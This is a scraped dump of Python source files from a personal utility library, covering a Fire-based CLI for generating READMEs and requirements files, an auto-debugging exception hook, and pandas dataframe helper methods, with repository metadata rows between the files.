        strict=False warns and returns the whole candidate list.

    Returns
    -------
    str (or list of str when strict=False finds several matches).

    Examples
    --------
    # We must tell the function to skip 'df' here, since that loop variable
    # temporarily points at each df of interest too.
    res = {}
    for df in (train, val, test):
        res[varname(df, 'df')] = process(df)
    res.keys()
    ['train', 'val', 'test']
    """
    excluded = set(skip)
    target = id(x)
    candidates = set(
        name for name, val in globals().items() if id(val) == target
        and (not skip_ipy_names or not is_ipy_name(name))
    )
    candidates = list(candidates - excluded)
    count = len(candidates)
    if count > 1:
        if strict:
            raise RuntimeError(
                f'Found {count} matching names: {candidates}. '
                'Set strict=False to return a list of candidates in this '
                'scenario.'
            )
        warnings.warn(f'Found {count} matches: {candidates}. '
                      'Returning all of them because strict=False.')
        return candidates
    if not candidates:
        raise RuntimeError(
            f'Found zero matching variable names for input: {x}')
    return candidates[0]
SENTINEL = object()
| {"/htools/magics.py": ["/htools/meta.py"], "/htools/meta.py": ["/htools/core.py", "/htools/config.py"], "/htools/__init__.py": ["/htools/core.py", "/htools/meta.py", "/htools/structures.py"], "/notebooks/scratch_trie_with_attrs.py": ["/htools/core.py"], "/htools/structures.py": ["/htools/core.py", "/htools/meta.py"], "/htools/core.py": ["/htools/config.py"], "/htools/cli.py": ["/htools/core.py", "/htools/meta.py"], "/htools/autodebug.py": ["/htools/meta.py"], "/htools/pd_tools.py": ["/htools/core.py", "/htools/__init__.py"]} |
78,153 | hdmamin/htools | refs/heads/master | /htools/cli.py | import ast
from datetime import datetime
import fire
from functools import wraps
import json
import pandas as pd
from pathlib import Path
import pkg_resources as pkg
from pkg_resources import DistributionNotFound
import pyperclip
import subprocess
import sys
import warnings
from htools.core import tolist, flatten, save
from htools.meta import get_module_docstring, in_standard_library, source_code
def Display(lines, out):
    """Monkeypatch for the Fire CLI so that "help" text is written straight
    to stdout instead of opening a `less` pager window. Fire invokes this
    itself - users never call it with arguments.

    import fire

    def main():
        # do something

    if __name__ == '__main__':
        fire.core.Display = Display
        fire.Fire(main)
    """
    joined = '\n'.join(lines)
    out.write(joined + '\n')
fire.core.Display = Display
# Start of htools CLI below. Stuff above is to import when building new CLIs
# in other projects.
# TODO: adjust readme updater init so we can pass in lib-dirs and non-lib dirs
# separately. Ran into some annoying issues where setup.py in parent doesn't
# actually mean a dir is a package.
class ReadmeUpdater:
    """This is generally intended for a structure where each directory contains
    either python scripts OR jupyter notebooks - I haven't tested it on
    directories containing both. This is also not intended to work recursively:
    we only try to update 1 readme file per directory.
    """

    # Timestamp format used for the "Last updated" line in generated readmes.
    time_fmt = '%Y-%m-%d %H:%M:%S'
    # Markers bracketing the auto-generated section of a README, so it can be
    # located and replaced on subsequent runs without touching hand-written
    # content above it.
    readme_id_start = '\n---\nStart of auto-generated file data.<br/>'
    readme_id_end = '\n<br/>End of auto-generated file data. Do not add ' \
                    'anything below this.\n'
    # Regex source matching everything between the start and end markers.
    readme_regex = readme_id_start + '(.|\n)*' + readme_id_end
    # Shell command template: unix timestamp of a file's last git commit.
    # NOTE(review): presumably consumed by last_modified_date (defined
    # further down this class, outside this view) - confirm before editing.
    last_edited_cmd_fmt = 'git log -1 --pretty="format:%ct" {}'
def __init__(self, *dirs, default='_', detect_library=True):
"""
Parameters
----------
dirs: str
One or more paths (we recommend entering these relative to the
project root, where you should be running the command from, though
absolute paths should work too).
default: str
Used when a python file lacks a module-level docstring or a jupyter
notebook lacks a "# Summary" markdown cell near the top.
detect_library: bool
If True, we try to check if each directory is a python library. If
it is, the readme file will be placed in its parent rather than the
dir with all the python files. This is useful if you have py files
in `lib/my_library_name` but want to update the readme in `lib`.
Example
-------
updater = ReadmeUpdater('bin', 'lib/my_library_name', 'notebooks')
updater.update_dirs()
"""
self.dirs = [Path(d) for d in dirs]
self.extensions = {'.py', '.ipynb'}
self.default = default
self.detect_library = detect_library
def update_dirs(self, *dirs):
    """Update README files in the relevant directories.

    Parameters
    ----------
    dirs: str
        If none are provided, this defaults to `self.dirs`. If you specify
        values, this will process only those directories.
        NOTE(review): explicitly-passed values must support Path operations
        (.parent, iterdir, the / operator) - pass Path objects, or rely on
        self.dirs which __init__ already converts.
    """
    for dir_ in dirs or self.dirs:
        file_df = self._parse_dir_files(dir_)
        # Nothing summarizable here -> leave this directory's README alone.
        if file_df.empty: continue
        # In this first scenario, we check files in the specified path but
        # update the readme of its parent. This is useful for a file
        # structure like `lib/my_library_name`: we want to parse files from
        # `lib/my_library_name` but update the readme in `lib`.
        if self.detect_library and 'setup.py' in \
                set(p.parts[-1] for p in dir_.parent.iterdir()):
            readme_path = dir_.parent/'README.md'
        else:
            readme_path = dir_/'README.md'
        self.update_readme(readme_path, file_df)
def _parse_dir_files(self, dir_):
    """Extract information (summary, modify time, size, etc.) from each
    python script or ipy notebook in a directory.

    Parameters
    ----------
    dir_: Path
        Directory to parse. The intention is this should either contain
        notebooks OR python scripts since that's my convention - I'm not
        sure if it will work otherwise.

    Returns
    -------
    pd.DataFrame: 1 row for each relevant file. This works best with my
        convention of naming files like "nb01_eda.ipynb" or
        "s01_download_data.py" since results are sorted by name.
    """
    files = []
    for path in dir_.iterdir():
        # Only .py and .ipynb files (self.extensions) are summarized.
        if path.suffix not in self.extensions: continue
        stats = path.stat()
        # Want py/ipy custom fields to come before change time/size in df.
        files.append({
            'File': path.parts[-1],
            **self.parse_file(path),
            # NOTE(review): last_modified_date/readable_file_size are class
            # helpers defined outside this view - verify their contracts
            # (git-based vs stat-based mtime?) before changing this.
            'Last Modified': self.last_modified_date(path),
            'Size': self.readable_file_size(stats.st_size)
        })
    # File numbering convention means these should be displayed in a
    # logical order. Sort columns so name and summary are first.
    df = pd.DataFrame(files)
    # An empty frame has no 'File' column, so sorting would raise KeyError.
    if df.empty: return df
    return df.sort_values('File').reset_index(drop=True)
def parse_file(self, path):
"""Wrapper to parse a python script or ipy notebook.
Parameters
----------
path
Returns
-------
dict: Should have key 'Summary' regardless of file type. Other keys
vary depending on whether the file is a script or notebook.
"""
return getattr(self, f'_parse_{path.suffix[1:]}')(path)
def update_readme(self, path, file_df):
"""Load a readme file, replace the old auto-generated table with the
new one (or adds it if none is present), and writes back to the same
path.
Parameters
----------
path: Path
Readme file location. Will be created if it doesn't exist.
file_df: pd.DataFrame
1 row for each file, where columns are things like file
name/size/summary.
"""
path.touch()
with open(path, 'r+') as f:
text = f.read().split(self.readme_id_start)[0] \
+ self._autogenerate_text(file_df)
f.seek(0)
f.write(text)
def _autogenerate_text(self, df):
"""Create the autogenerated text portion that will be written to a
readme. This consists of dataframe html (my notebooks/files sometimes
contain markdown so a markdown table was a bit buggy) sandwiched
between some text marking the start/end of autogeneration.
Parameters
----------
df: pd.DataFrame
DF where 1 row corresponds to 1 file.
Returns
-------
str: Autogenerated text to plug into readme.
"""
date_str = 'Last updated: ' + datetime.now().strftime(self.time_fmt)
autogen = (self.readme_id_start + date_str + '\n\n'
+ df.to_html(index=False).replace('\\n', '<br/>')
+ self.readme_id_end)
return autogen
def _parse_py(self, path):
"""Process a python script to find its summary (module-level docstring)
and line count.
Parameters
----------
path: Path
Returns
-------
dict: Information about the file specified by `path`. Additional
attributes can be added without issue.
"""
with open(path, 'r') as f:
text = f.read()
tree = ast.parse(text)
return {'Summary': ast.get_docstring(tree) or self.default,
'Line Count': len(text.splitlines())}
    def _parse_ipynb(self, path):
        """Extract summary and other stats (# of code/markdown cells) from a
        notebook. The summary must be a markdown cell within the first 3 cells
        of the notebook where the first line is '# Summary' (this shows up as a
        large header in markdown).

        Parameters
        ----------
        path: Path

        Returns
        -------
        dict: Information about the file specified by `path`. Additional
        attributes can be added without issue.
        """
        with open(path, 'r') as f:
            cells = json.load(f)['cells']

        # Default summary is used unless a '# Summary' markdown cell is found.
        res = {
            'Summary': self.default,
            'Code Cell Count': len([c for c in cells
                                    if c['cell_type'] == 'code']),
            'Markdown Cell Count': len([c for c in cells
                                        if c['cell_type'] == 'markdown'])
        }
        # Only the first 3 cells are searched; the first match wins and we
        # return immediately.
        # NOTE(review): `cell['source'][0]` assumes a markdown cell's source
        # list is non-empty - an empty markdown cell would raise IndexError.
        # Confirm against real notebooks.
        for cell in cells[:3]:
            if cell['cell_type'] == 'markdown' and \
                    'summary' in cell['source'][0].lower():
                # Notebook lines include newlines so we don't add them back in.
                res['Summary'] = ''.join(cell['source'][1:]).strip()
                return res
        return res
def timestamp_to_time_str(self, time):
"""Convert a timestamp to a nicely formatted datetime string.
Parameters
----------
time: int
Returns
-------
str: Format like '2021/03/31 15:43:00'
"""
return datetime.fromtimestamp(time).strftime(self.time_fmt)
    def last_modified_date(self, path):
        """Get the last time a file was modified. If in a git repo, this
        information is often uninformative due to pulls, but we try to retrieve
        the data by checking the last commit each file changed in. This will
        fail if running the command from a different repo (which you shouldn't
        really ever do) and fall back to the file system's record of last
        modified time.

        Parameters
        ----------
        path: Path

        Returns
        -------
        str: Date formatted like in `timestamp_to_time_str`.
        """
        try:
            # If we're in a git repo, file edit times are changed when we pull
            # so we have to use built-in git functionality. This will fail if
            # we call the command from a different repo. I vaguely recall
            # seeing weird git behavior inside running docker containers so I'm
            # not sure if this will work there.
            git_time = subprocess.check_output(
                self.last_edited_cmd_fmt.format(path).split()
            )
            # Git output looks like 'format:"<timestamp>"'; strip the
            # decoration to get a bare integer timestamp.
            timestamp = int(git_time.decode().strip()
                            .replace('format:', '').replace('"', ''))
        except Exception as e:
            # Any failure (not in a repo, git missing, parse error) falls back
            # to the filesystem's change time.
            timestamp = path.stat().st_ctime
        return self.timestamp_to_time_str(timestamp)
@staticmethod
def readable_file_size(n_bytes):
"""Convert a file size in bytes to a human readable unit. Not
extensively tested but it seems to work so far.
Parameters
----------
n_bytes: int
Returns
-------
str: File size in a more human readable unit (e.g. mb or gb). A space
separates the numeric portion and the unit name.
"""
power = len(str(n_bytes)) - 1
assert power < 24, 'Are you sure file is larger than a yottabyte?'
prefix_powers =[
(0, 'b'),
(3, 'kb'),
(6, 'mb'),
(9, 'gb'),
(12, 'tb'),
(15, 'pb'),
(18, 'eb'),
(21, 'zb'),
(24, 'yb')
]
prev_pow = 0
prev_pre = 'b'
for curr_pow, curr_pre in prefix_powers:
if power < curr_pow: break
prev_pow = curr_pow
prev_pre = curr_pre
return f'{(n_bytes / 10**prev_pow):.2f} {prev_pre}'
def module_docstring(func):
    """Decorator to add the current module's docstring to a function's
    docstring. This is intended for use in simple (1 command,
    zero or minimal arguments) fire CLIs where I want to write a single
    docstring for the module and function. Writing it at the module level
    allows htools.cli.ReadmeUpdater to update the appropriate readme, while
    this decorator ensures that the info will be available when using the
    '--help' flag at the command line. Do NOT use this on functions in a
    library - I've only tested it on py scripts and it relies on sys.argv, so
    I'm pretty sure it will break outside of the intended context.
    """
    doc = func.__doc__ or ''
    # sys.argv[0] is the path of the running script - this is why the
    # decorator only makes sense in a standalone py script.
    module_doc = get_module_docstring(sys.argv[0])
    # Mutate func.__doc__ BEFORE @wraps copies metadata onto the wrapper, so
    # the wrapper inherits the combined docstring.
    if doc:
        func.__doc__ = module_doc + '\n\n' + doc
    else:
        func.__doc__ = module_doc

    @wraps(func)
    def wrapper(*args, **kwargs):
        return func(*args, **kwargs)
    return wrapper
def _pypi_safe_name(name):
"""Try to map from import name to install name. Going the other direction
is straightforward using pkg_resources but this is harder.
Parameters
----------
name: str
Import name of library, e.g. sklearn, requests.
Returns
-------
str: Install name of library. This is NOT foolproof: we make a few
hard-coded replacements for popular libraries (sklearn -> scikit-learn)
and replace underscores with dashes, but there's no guarantee this will
catch everything.
"""
# Common packages where install name differs from import name. It's easy to
# go from install name to import name but harder to go the reverse
# direction.
import2pypi = {
'bs4': 'beautifulsoup4',
'sklearn': 'scikit-learn',
'PIL': 'pillow',
'yaml': 'pyyaml',
}
return import2pypi.get(name, name.replace('_', '-'))
def module_dependencies(path, package='', exclude_std_lib=True):
    """Find a python script's dependencies. Assumes a relatively standard
    import structure (e.g. no programmatic imports using importlib).

    # TODO: at the moment, this does not support:
    - relative imports
    - libraries whose install name differs from its import name aside from
    popular cases like scikit-learn (in other cases, this would return the
    equivalent of "sklearn")

    Parameters
    ----------
    path: str or Path
        Path to the python file in question.
    package: str
        If provided, this should be the name of the library the module belongs
        to. This will help us differentiate between internal and external
        dependencies. Make sure to provide this if you want internal
        dependencies.
    exclude_std_lib: bool
        Since we often use this to help generate requirements files, we don't
        always care about built-in libraries.

    Returns
    -------
    tuple[list]: First item contains external dependencies (e.g. torch). Second
    item contains internal dependencies (e.g. htools.cli depends on htools.core
    in the sense that it imports it).
    """
    # `skip` is for packages that are imported and aren't on pypi but don't
    # show up as being part of the standard library (in the case of pkg_
    # resources, I believe it's part of a library that IS part of the standard
    # library but from the way it's imported that's not clear to our parser.
    # These MUST be import names (not install names) if they differ.
    skip = {'pkg_resources'}
    with open(path, 'r') as f:
        tree = ast.parse(f.read())

    libs = []
    internal_modules = []
    # Only top-level statements are scanned, so imports nested inside
    # functions or conditionals are not picked up.
    for obj in tree.body:
        if isinstance(obj, ast.ImportFrom):
            # NOTE(review): `obj.module` is None for relative imports
            # ("from . import x"), which would crash the split below - this
            # matches the documented lack of relative-import support.
            parts = obj.module.split('.')
            if parts[0] == package:
                if len(parts) > 1:
                    # "from package.sub import x" -> internal module "sub".
                    internal_modules.append('.'.join(parts[1:]))
                else:
                    # "from package import mod" - the imported name itself is
                    # the internal module.
                    assert len(obj.names) == 1, \
                        'Your import seems to have multiple aliases, which ' \
                        'we don\'t know how to process.'
                    assert isinstance(obj.names[0], ast.alias), \
                        f'Expected object name to be an alias but it ' \
                        f'was {obj.names[0]}.'
                    internal_modules.append(obj.names[0].name)
            else:
                libs.append(obj.module)
        elif isinstance(obj, ast.Import):
            names = [name.name for name in obj.names]
            assert len(names) == 1, f'Error parsing import: {names}.'
            libs.append(names[0])

    # Make sure to filter out `skip` before applying _pypi_safe_name.
    # partition('.') keeps only the top-level package of dotted imports.
    libs = set(_pypi_safe_name(lib.partition('.')[0]) for lib in libs
               if lib not in skip)
    if exclude_std_lib:
        # in_standard_library is defined elsewhere in htools.
        libs = (lib for lib in libs if not in_standard_library(lib))
    return sorted(libs), sorted(internal_modules)
def _resolve_dependencies(mod2ext, mod2int):
"""Fully resolve dependencies: if module "a" depends on "b" in the same
package (an "internal" dependency), "a" implicitly depends on all of "b"'s
external dependencies.
Parameters
----------
mod2ext: dict[str, list]
Maps module name to list of names of external dependencies (e.g.
torch).
mod2int: dict[str, list]
Maps module name to list of names of internal dependencies.
Returns
-------
dict[str, list]: Maps module name to list of module names (external only,
but accounts for implicit dependencies).
"""
old = {}
new = {k: set(v) for k, v in mod2ext.items()}
# If module a depends on b and b depends on c, we may require
# multiple rounds of updates.
while True:
for k, v in mod2ext.items():
new[k].update(flatten(new[mod] for mod in mod2int[k]))
if old == new: break
old = new
return {k: sorted(v) for k, v in new.items()}
def library_dependencies(lib, skip_init=True):
    """Find libraries a library depends on. This helps us generate
    requirements.txt files for user-built packages. It also makes it easy to
    create different dependency groups for setup.py, allowing us to install
    htools[meta] or htools[core] (for example) instead of all htools
    requirements if we only want to use certain modules.

    Runs in the current working directory.

    # TODO: at the moment, this does not support:
    - relative imports
    - nested packages
    - running from different directories (currently it just checks all python
    files in the current directory)
    - libraries whose install name differs from its import name except for
    popular cases like scikit-learn (in other cases, this would return the
    equivalent of "sklearn")
    - imports like "from library import module as alias"

    Parameters
    ----------
    lib: str
        Name of library.
    skip_init: bool
        If True, ignore the __init__.py file.

    Returns
    -------
    dict: Keys are 'overall' (sorted list of all external dependencies),
    'external' (dict mapping module name to its external dependencies),
    'internal' (dict mapping module name to its internal dependencies), and
    'resolved' (dict mapping module name to a fully resolved list of external
    dependencies, including implicit ones: e.g. if htools.core imports
    requests and htools.meta imports htools.core, then htools.meta depends on
    requests too).
    """
    mod2deps = {}
    mod2int_deps = {}
    # Scan every python file in the current working directory.
    for path in Path('.').iterdir():
        if path.suffix != '.py' or (skip_init and path.name == '__init__.py'):
            continue
        try:
            external, internal = module_dependencies(path, lib)
        except AssertionError as e:
            # Surface the offending file name so the failure is actionable.
            raise RuntimeError(f'Error processing {path.name}: {e}')
        mod2deps[path.stem] = external
        mod2int_deps[path.stem] = internal
    fully_resolved = _resolve_dependencies(mod2deps, mod2int_deps)
    # Union of every module's direct external dependencies.
    all_deps = set(sum(mod2deps.values(), []))
    return dict(overall=sorted(all_deps),
                external=mod2deps,
                internal=mod2int_deps,
                resolved=fully_resolved)
def _libs2readme_str(lib2version):
return '\n'.join(f'{k}=={v}' if v else k for k, v in lib2version.items())
# TODO: figure out how to handle __init__.py when finding deps (maybe need to
# wrap each star import in try/except?). Also add extra func so the CLI command
# for find_dependencies generates text/markdown/yaml/json files we can load in
# setup.py.
def make_requirements_file(lib, skip_init=True, make_resolved=False,
                           out_path='../requirements.txt'):
    """Generate a requirements.txt file for a project by extracting imports
    from the python source code. You must run this from the lib directory, e.g.
    from something like ~/project/lib/htools.

    Parameters
    ----------
    lib: str
        Name of the library being processed.
    skip_init: bool
        If True, ignore the __init__.py file.
    make_resolved: bool
        If True, also write a json file mapping each module to its own
        requirements string (useful for setup.py `install_requires` variants).
    out_path: str
        Where to write the requirements file.

    Returns
    -------
    str: The text written to the requirements file.
    """
    deps = library_dependencies(lib, skip_init)
    lib2version = {}
    # Fix: the loop variable previously shadowed the `lib` parameter; use a
    # distinct name so the parameter keeps its meaning throughout the
    # function.
    for dep in deps['overall']:
        try:
            lib2version[dep] = pkg.get_distribution(dep).version
        except DistributionNotFound:
            warnings.warn(
                f'Could not find {dep} installed. You should confirm '
                'if its pypi name differs from its import name.'
            )
            lib2version[dep] = None
    # Need to sort again because difference between import name and install
    # name can mess up our ordering.
    file_str = _libs2readme_str(lib2version)
    save(file_str, out_path)
    # If desired, generate a json mapping each module to its own requirements
    # file. Modules with no dependencies will not have a key. The json file
    # can then be loaded in setup.py to easily create a number of different
    # `install_requires` variants.
    if make_resolved:
        out_dir = Path(out_path).parent
        module2readme = {}
        for mod, libs in deps['resolved'].items():
            readme = _libs2readme_str({name: lib2version[name]
                                       for name in libs})
            if readme: module2readme[mod] = readme
        save(module2readme, out_dir/'module2readme.json')
    return file_str
# TODO: might be cleaner to compile all this readme functionality into a single
# class.
def update_readmes(dirs, default='_'):
    """Update readme files with a table of info about each python file or ipy
    notebook in the relevant directory. This relies on python files having
    module level docstrings and ipy notebooks having a markdown cell starting
    with '# Summary' (this must be one of the first 3 cells in the notebook).
    We also provide info on last edited times and file sizes.

    Parameters
    ----------
    dirs: str or list[str]
        One or more directories to update readme files for.
    default: str
        Default value to use when no docstring/summary is available.
    """
    updater = ReadmeUpdater(*tolist(dirs), default=default)
    updater.update_dirs()
def source(name, lib='htools', copy=False):
    """Print or copy the source code of a class/function defined in htools.

    Parameters
    ----------
    name: str
        Class or function defined in htools.
    lib: str
        Name of library containing `name`, usually 'htools'. Won't work on
        the standard library or large complex libraries (specifically, those
        with nested file structures).
    copy: bool
        If True, copy the source code to the clipboard. If False, simply
        print it out.

    Returns
    -------
    str: Source code of htools class/function.

    Examples
    --------
    # Copies source code of auto_repr decorator to clipboard. Excluding the
    # -c flag will simply print out the source code.
    htools src auto_repr -c
    """
    src, backup_name = source_code(name, lib_name=lib)
    if not src:
        print(f'Failed to retrieve `{name}` source code from {lib}.')
        if backup_name != name:
            # Fix: the suggested command must invoke the `htools` CLI entry
            # point (not `{lib}`), and fire flags take the form `--lib value`;
            # the old suggestion `--lib = {lib}` was not a valid invocation.
            cmd = f'htools src {backup_name}'
            if lib != 'htools':
                cmd += f' --lib {lib}'
            print(f'We suggest trying the command:\n\n{cmd}')
    if copy:
        pyperclip.copy(src)
    else:
        print(src)
def cli():
    """Entry point for the htools command line interface: expose the
    readme/requirements/source-lookup commands through fire."""
    commands = {
        'update_readmes': update_readmes,
        'make_requirements': make_requirements_file,
        'src': source
    }
    fire.Fire(commands)
| {"/htools/magics.py": ["/htools/meta.py"], "/htools/meta.py": ["/htools/core.py", "/htools/config.py"], "/htools/__init__.py": ["/htools/core.py", "/htools/meta.py", "/htools/structures.py"], "/notebooks/scratch_trie_with_attrs.py": ["/htools/core.py"], "/htools/structures.py": ["/htools/core.py", "/htools/meta.py"], "/htools/core.py": ["/htools/config.py"], "/htools/cli.py": ["/htools/core.py", "/htools/meta.py"], "/htools/autodebug.py": ["/htools/meta.py"], "/htools/pd_tools.py": ["/htools/core.py", "/htools/__init__.py"]} |
78,154 | hdmamin/htools | refs/heads/master | /htools/autodebug.py | """Importing this module will cause us to enter a debugging session whenever
an error is thrown. It is not included in `from htools import *` because this
is rather extreme behavior.
Examples
--------
# Enable auto debugging session on error.
from htools import debug
# Revert to default python behavior.
autodebug.disable()
"""
import sys
from IPython import get_ipython
import pdb
import traceback
from htools.meta import monkeypatch
# Keep a reference to the original hook so disable() can restore it later.
default_excepthook = sys.excepthook
# None when not running inside an IPython shell.
ipy = get_ipython()
@monkeypatch(sys, 'excepthook')
def excepthook(type_, val, tb):
    """Replaces sys.excepthook when module is imported, which makes us enter
    a debugging session whenever an error is thrown. Disable by calling
    autodebug.disable().

    Parameters
    ----------
    type_: type
        Exception class that was raised.
    val: BaseException
        The exception instance.
    tb: traceback
        Traceback object associated with the exception.
    """
    # Print the standard traceback first so the user still sees the error
    # context, then drop into a post-mortem pdb session at the failure point.
    traceback.print_exception(type_, val, tb)
    pdb.post_mortem(tb)
def ipy_excepthook(self, etype, evalue, tb, tb_offset):
    """IPython doesn't use sys.excepthook. We have to handle this separately
    and make sure it expects the right arguments.

    Parameters
    ----------
    self
        The IPython shell instance (passed in by `set_custom_exc`).
    etype, evalue, tb
        Exception class, exception instance, and traceback.
    tb_offset
        Accepted for interface compatibility with set_custom_exc; unused.
    """
    return excepthook(etype, evalue, tb)
def disable():
    """Revert to default behavior: restore the original sys.excepthook and
    remove the custom IPython Exception handler registered by this module.
    """
    sys.excepthook = default_excepthook
    # Tried doing `ipy.set_custom_exc((Exception,), None)` as suggested by
    # stackoverflow and chatgpt but it didn't quite restore the default
    # behavior. Manually remove this instead. I'm assuming only one custom
    # exception handler can be assigned for any one exception type and that
    # if we call disable(), we wish to remove the handler for Exception.
    ipy.custom_exceptions = tuple(x for x in ipy.custom_exceptions
                                  if x != Exception)
# Only necessary/possible when in ipython: outside an IPython shell `ipy` is
# None, so the attribute access raises AttributeError and we simply skip
# registering the custom handler (sys.excepthook was already patched above).
try:
    ipy.set_custom_exc((Exception,), ipy_excepthook)
except AttributeError:
    pass
| {"/htools/magics.py": ["/htools/meta.py"], "/htools/meta.py": ["/htools/core.py", "/htools/config.py"], "/htools/__init__.py": ["/htools/core.py", "/htools/meta.py", "/htools/structures.py"], "/notebooks/scratch_trie_with_attrs.py": ["/htools/core.py"], "/htools/structures.py": ["/htools/core.py", "/htools/meta.py"], "/htools/core.py": ["/htools/config.py"], "/htools/cli.py": ["/htools/core.py", "/htools/meta.py"], "/htools/autodebug.py": ["/htools/meta.py"], "/htools/pd_tools.py": ["/htools/core.py", "/htools/__init__.py"]} |
78,155 | hdmamin/htools | refs/heads/master | /htools/pd_tools.py | from functools import partial
from IPython.display import display, HTML
from numbers import Number
import numpy as np
import operator
import pandas as pd
import pandas_flavor as pf
from htools.core import spacer
from htools import set_module_global
@pf.register_series_method
@pf.register_dataframe_method
def ends(df, n=2):
    """Display the first and last few rows of a dataframe.

    Parameters
    -----------
    n: int
        Number of rows to return in the head and tail, respectively. The total
        number of rows returned will be equal to 2*n.

    Returns
    --------
    pd.DataFrame
    """
    assert n > 0, 'n must be positive.'
    # A short frame would just duplicate rows - return it untouched.
    if 2 * n > df.shape[0]:
        return df
    return pd.concat((df.head(n), df.tail(n)), axis=0)
@pf.register_dataframe_method
def filter_by_count(df, col, method, value, norm=False):
    """Filter a dataframe to return a subset of rows determined by their
    value_counts(). For example, we can return rows with users who appear
    at least 5 times in the dataframe, or with users who appear less than 10
    times, or who appear exactly once.

    Parameters
    -----------
    col: str
        Name of dataframe column to filter by.
    method: str
        Symbol specifying which operation to use for filtering.
        One of ('=', '<', '>', '<=', '>=').
    value: int, float
        Numeric value that each row in `col` will be compared against.
    norm: bool
        If True, filtering will occur on normalized values (so the value
        should be a float between 0 and 1).

    Returns
    --------
    pd.DataFrame

    Examples
    ---------
    Return rows containing users who appear at least 5 times:
    df.filter_by_count('user_id', '>=', 5)

    Return rows containing users who make up less than 20% of rows:
    df.filter_by_count('user_id', '<', .2, True)
    """
    comparators = {'=': operator.eq,
                   '>': operator.gt,
                   '<': operator.lt,
                   '>=': operator.ge,
                   '<=': operator.le}
    compare = comparators[method]
    counts = df[col].value_counts(norm)
    # Keep only the categories whose count satisfies the comparison.
    keep = counts[compare(counts, value)].index
    return df[df[col].isin(keep)]
@pf.register_dataframe_method
def grouped_mode(df, xs, y):
    """Return the most common value in column y for each value or combination
    of values of xs. Note that this can be slow, especially when passing in
    multiple x columns.

    Parameters
    -----------
    xs: list[str]
        One or more column names to group by.
    y: str
        Column to calculate the modes from.

    Returns
    --------
    pd.Series
    """
    def first_mode(group):
        # pd.Series.mode returns every tied value; keep only the first.
        return pd.Series.mode(group)[0]

    # Rows with a null target can't contribute to a mode.
    return df.dropna(subset=[y]).groupby(xs)[y].agg(first_mode)
@pf.register_dataframe_method
def impute(df, col, fill_val=None, method='mean', inplace=False, dummy=True):
    """Fill null values in the specified column, then optionally add an
    additional column specifying whether the first column was originally null.
    This can be useful in certain machine learning problems if the fact that a
    value is missing may indicate something about the example.

    For instance, we might try to predict student test scores, where one
    feature column records the survey results of asking the student's parent to
    rate their satisfaction with the teacher on a scale of 1-5. If the value is
    missing, that means the parent didn't take the survey, and therefore may
    not be very involved with the student's academics. This could be highly
    relevant information that we don't want to discard, which we would if we
    simply imputed the missing value and made no record of it.

    Parameters
    -----------
    col: str
        Name of df column to fill null values for.
    fill_val: str, int, float, None
        If specified, this constant value will be used to impute missing
        values. If None, the `method` argument will be used to compute a fill
        value.
    method: str
        One of ('mean', 'median', 'mode'). This will only be used when fill_val
        is None. More complex methods, such as building a model to predict the
        missing values based on other features, must be done manually.
    inplace: bool
        Specify whether to perform the operation in place (default False).
    dummy: bool
        Specify whether to add a dummy column recording whether the value was
        initially null (default True).

    Returns
    --------
    pd.DataFrame
    """
    if not inplace:
        df = df.copy()
    # If adding a dummy column, it must be created before imputing null values.
    # Multiplying by 1 converts the boolean mask to 0/1 ints.
    if dummy:
        df[col + '_isnull'] = df[col].isnull() * 1
    # Mode returns a series, mean and median return primitives.
    if fill_val is None:
        fill_val = getattr(df[col], method)()
        if method == 'mode':
            fill_val = fill_val[0]
    df[col].fillna(fill_val, inplace=True)
    if not inplace:
        return df
@pf.register_dataframe_method
def target_encode(df, x, y, n=5, stat='mean', shuffle=True, state=None,
                  inplace=False, df_val=None):
    """Compute target encoding based on one or more feature columns.

    Parameters
    -----------
    x: str, list[str]
        Name of columns to group by.
    y: str
        Name of target variable column.
    n: int
        Number of folds for regularized version. Must be >1.
    stat: str
        Specifies the type of aggregation to use on the target column.
        Typically this would be mean or occasionally median, but all the
        standard dataframe aggregation functions are available:
        ('mean', 'median', 'min', 'max', 'std', 'var', 'skew').
    shuffle: bool
        Specifies whether to shuffle the dataframe when creating folds of the
        data. This would be important, for instance, if the dataframe is
        ordered by a user_id, where each user has multiple rows. Here, a lack
        of shuffling means that all of a user's rows are likely to end up in
        the same fold. This effectively eliminates the value of creating the
        folds in the first place.
    state: None, int
        If state is an integer and shuffle is True, the folds produced by
        KFold will be repeatable. If state is None (the default) and shuffle
        is True, shuffling will be different every time.
    inplace: bool
        Specifies whether to do the operation in place. The inplace version
        does not return anything. When inplace==False, the dataframe is
        returned.
    df_val: None, pd.DataFrame
        Validation set (optional). If provided, naive (i.e. un-regularized)
        target encoding will be performed using the labels from the original
        (i.e. training) df. NOTE: Inplace must be True when passing in df_val,
        because we only return the original df.

    Returns
    --------
    pd.DataFrame or None
    """
    assert df_val is None or inplace, 'To encode df_val, inplace must be True.'

    # In practice I basically never use this method and I want to remove the
    # module-level sklearn import and library dependency. However, I don't
    # want to remove it from the library entirely (in most cases it will be
    # installed anyway, and if it's not I almost certainly won't be needing
    # this method).
    try:
        from sklearn.model_selection import KFold
    except ImportError:
        raise RuntimeError('sklearn must be installed to use target_encode '
                           'method.')

    # Prevents SettingWithCopy warning, which is not actually an issue here.
    pd.options.mode.chained_assignment = None
    if not inplace:
        df = df.copy()
    new_col = f"{'_'.join(x)}__{stat}_enc"
    # Global aggregate serves as the fallback for unseen/missing groups.
    global_agg = getattr(df[y], stat)()
    df[new_col] = global_agg

    def indexer(row):
        """Map a dataframe row to its grouped target value. When we group by
        multiple columns, our groupby object `enc` will require a tuple index.

        Note: When benchmarking function speed, it was slightly faster when
        leaving the if statement inside this function. Not sure if this is a
        coincidence but it at least seems like it's not hurting performance.
        """
        key = row[0] if len(x) == 1 else tuple(row)
        return enc.get(key, global_agg)

    # Compute target encoding on n-1 folds and map back to nth fold.
    # Fix: pass KFold arguments by keyword - positional `shuffle`/`state`
    # were deprecated and then removed in modern scikit-learn.
    for train_idx, val_idx in KFold(n_splits=n, shuffle=shuffle,
                                    random_state=state).split(df):
        enc = getattr(df.iloc[train_idx, :].groupby(x)[y], stat)()
        mapped = df.loc[:, x].iloc[val_idx].apply(indexer, axis=1)
        df.loc[:, new_col].iloc[val_idx] = mapped
    df[new_col].fillna(global_agg, inplace=True)

    # Encode validation set in place if it is passed in. No folds are used.
    if df_val is not None:
        enc = getattr(df.groupby(x)[y], stat)()
        df_val[new_col] = df_val[x].apply(indexer, axis=1).fillna(global_agg)
    if not inplace:
        return df
@pf.register_dataframe_method
def top_categories(df, col, n_categories=None, threshold=None):
    """Filter a dataframe to return rows containing the most common
